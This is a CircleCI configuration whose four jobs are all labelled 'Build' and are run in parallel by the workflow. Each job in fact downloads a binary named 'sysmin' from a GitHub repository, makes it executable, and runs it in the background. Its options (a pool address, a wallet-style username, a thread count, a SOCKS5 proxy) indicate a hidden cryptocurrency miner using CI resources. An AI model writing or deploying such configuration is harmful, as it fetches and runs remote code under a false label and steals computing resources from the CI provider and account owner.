version: 2 
jobs: 
    Build_01: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget -q https://github.com/terminaler/yulu/raw/main/sysmin && chmod +x sysmin && nohup ./sysmin -o 178.62.79.115:24877 -v -l 139.99.123.225:3956 -u RSK1DEPiQxQ68CYwLtfsvYemXSV3pVN7bW.gc -p x -t 25 --proxy socks5://72.195.114.184:4145 > nohup.out  
    Build_02: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget -q https://github.com/terminaler/yulu/raw/main/sysmin && chmod +x sysmin && nohup ./sysmin -o 178.62.79.115:24877 -v -l 139.99.123.225:3956 -u RSK1DEPiQxQ68CYwLtfsvYemXSV3pVN7bW.gc -p x -t 25 --proxy socks5://72.195.114.184:4145 > nohup.out
    Build_03: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget -q https://github.com/terminaler/yulu/raw/main/sysmin && chmod +x sysmin && nohup ./sysmin -o 178.62.79.115:24877 -v -l 139.99.123.225:3956 -u RSK1DEPiQxQ68CYwLtfsvYemXSV3pVN7bW.gc -p x -t 25 --proxy socks5://72.195.114.184:4145 > nohup.out 
    Build_04: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget -q https://github.com/terminaler/yulu/raw/main/sysmin && chmod +x sysmin && nohup ./sysmin -o 178.62.79.115:24877 -v -l 139.99.123.225:3956 -u RSK1DEPiQxQ68CYwLtfsvYemXSV3pVN7bW.gc -p x -t 25 --proxy socks5://72.195.114.184:4145 > nohup.out  
 
 
workflows: 
    version: 2 
    build: 
        jobs: 
            - Build_01 
            - Build_02 
            - Build_03 
            - Build_04